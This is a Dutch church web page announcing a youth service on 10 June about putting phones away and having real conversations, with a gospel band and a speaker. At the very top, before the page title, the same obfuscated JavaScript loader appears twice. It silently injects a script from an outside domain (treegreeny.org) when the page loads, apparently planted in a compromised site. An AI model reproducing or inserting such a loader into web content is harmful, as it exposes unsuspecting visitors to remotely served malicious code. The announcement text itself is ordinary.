;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); YOUNITED ... een goed gesprek ? - PKN Damwâld

YOUNITED … een goed gesprek ?

Gepubliceerd op: maandag 4 juni 2018

Wat gebeurt er als de stekker uit de wifi gaat? Telefoons gaan pingen, WIFI doet het niet!!!? Je stompt de ander aan, maar niemand heeft bereik. Je raakt met elkaar in gesprek. De telefoons verdwijnen in de broekzak en de gesprekken komen overal los!
Dit speelde zich af tijdens de kampeernacht van de jeugd bij de startzondag, bij het kampvuur na een avond sport en spel. Het werd harstikke gezellig.
In deze jeugddienst gaan we het hier over hebben. Hoe ga jij het gesprek met je een ander aan? Contact maken is best moeilijk als iedereen met de telefoon in de handen zit. Goeie gesprekken worden steeds zeldzamer, want via de smartphone is het maar heel oppervlakkig.
Samen met Teun van der Velde gaan wij in op welke goede gesprekken we voeren. Als we oppervlakkig contact met elkaar hebben, zullen we nooit het fijne van elkaar weten. Zo is het met ons geloof ook, als we het oppervlakkig houden, zullen we nooit tot de kern raken. Hierbij gesterkt door muziek van gospelband One Choice gaan we er weer een mooie dienst van maken, waarbij we hopen je te raken en te inspireren!
Jullie zijn van harte welkom op 10 juni om 19.30 uur in de Ontmoeting. Na afloop van de dienst staat er een drankje en een hapje klaar in het Honk.